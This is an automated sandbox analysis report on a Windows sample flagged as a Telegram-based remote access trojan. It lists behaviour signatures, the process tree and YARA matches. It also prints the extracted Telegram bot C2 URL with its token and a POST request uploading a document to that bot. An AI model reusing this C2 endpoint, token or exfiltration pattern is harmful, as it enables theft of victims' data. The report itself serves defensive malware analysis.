Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:1301561
MD5:42ba63deb6c8bfdd80b696e533ee9f2a
SHA1:08b4a60367f8b4220a0d0116f57a7fcfce6ed402
SHA256:21137e9491dedb0adf2088857f7cff726c5864c9c263d1e50740355ab62e3fdf
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Telegram RAT
Uses the Telegram API (likely for C&C communication)
May check the online IP address of the machine
DLL side loading technique detected
Potentially malicious time measurement code found
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 6828 cmdline: C:\Users\user\Desktop\file.exe MD5: 42BA63DEB6C8BFDD80B696E533EE9F2A)
    • test.exe (PID: 6860 cmdline: C:\Users\user\Desktop\file.exe MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)
      • test.exe (PID: 6884 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)
      • test.exe (PID: 6892 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)
        • cmd.exe (PID: 7004 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 7044 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • test.exe (PID: 6912 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)
      • test.exe (PID: 6928 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)
      • test.exe (PID: 6944 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)
  • cleanup
{"C2 url": "https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendMessage"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              1.0.test.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                2.2.test.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  6.0.test.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    3.0.test.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      4.0.test.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                        Click to see the 7 entries
                        No Sigma rule has matched
                        No Snort rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: test.exe.6860.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendMessage"}
                        Source: Binary string: D:\_w\2\b\bin\amd64\_socket.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233979809.00007FFD52DF9000.00000002.00000001.01000000.00000007.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_elementtree.pdb source: test.exe, 00000001.00000002.232393816.00007FFD43562000.00000002.00000001.01000000.00000014.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_ssl.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\unicodedata.pdb source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232132374.00007FFD40B6B000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_lzma.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233760323.00007FFD5138D000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\python39.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231915752.00007FFD40522000.00000002.00000001.01000000.00000005.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_multiprocessing.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233481520.00007FFD50964000.00000002.00000001.01000000.00000017.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_uuid.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: file.exe, 00000000.00000002.235504122.000000000342C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_hashlib.pdb source: file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_tkinter.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\39\b\libssl-1_1.pdb?? source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232265746.00007FFD40BF5000.00000002.00000001.01000000.00000011.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_zoneinfo.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_overlapped.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\select.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.234296791.00007FFD59254000.00000002.00000001.01000000.00000008.sdmp
                        Source: Binary string: C:\A\39\b\libssl-1_1.pdb source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232265746.00007FFD40BF5000.00000002.00000001.01000000.00000011.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\pyexpat.pdb source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232326114.00007FFD43524000.00000002.00000001.01000000.00000015.sdmp
                        Source: Binary string: comctl32v582.pdbGCTL source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1m 14 Dec 2021built on: Sun Dec 19 14:27:21 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: file.exe, 00000000.00000002.235504122.000000000342C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_bz2.pdb source: test.exe, 00000001.00000002.233902072.00007FFD5269F000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000002.00000002.222666433.00007FFD5269F000.00000002.00000001.01000000.00000009.sdmp
                        Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.234378780.00007FFD59271000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\A\39\b\libcrypto-1_1.pdb source: test.exe, 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_queue.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32v582.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_msi.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_lzma.pdbMM source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233760323.00007FFD5138D000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\sqlite3.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_ctypes.pdb source: test.exe, 00000001.00000002.233156751.00007FFD435C1000.00000002.00000001.01000000.0000000C.sdmp
                        Source: Binary string: The standard debugger class (pdb.Pdb) is an example. source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_sqlite3.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE3229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,1_2_00007FFD3FBE3229
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE3229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,2_2_00007FFD3FBE3229

                        Networking

                        barindex
                        Source: unknownDNS query: name: api.telegram.org
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeDNS query: name: ipinfo.io
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeDNS query: name: ipinfo.io
                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                        Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                        Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                        Source: global trafficHTTP traffic detected: POST /bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument HTTP/1.1Accept-Encoding: identityContent-Length: 656063Host: api.telegram.orgUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11Content-Type: multipart/form-data; boundary=4c49b1f3a67a4c2585c4e333b5fb8eabConnection: close
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://bugs.python.org/issue14443z
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: test.exe, 00000001.00000002.231496986.0000000006869000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000003.228596155.0000000006868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
                        Source: test.exe, 00000001.00000003.228724835.0000000005790000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230936770.0000000005790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
                        Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
                        Source: test.exe, 00000001.00000002.231004794.00000000057C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                        Source: test.exe, 00000001.00000003.228550797.00000000066E1000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231400935.00000000066E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.veris
                        Source: test.exe, 00000001.00000003.228550797.00000000066E1000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231400935.00000000066E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.verisign.coz
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
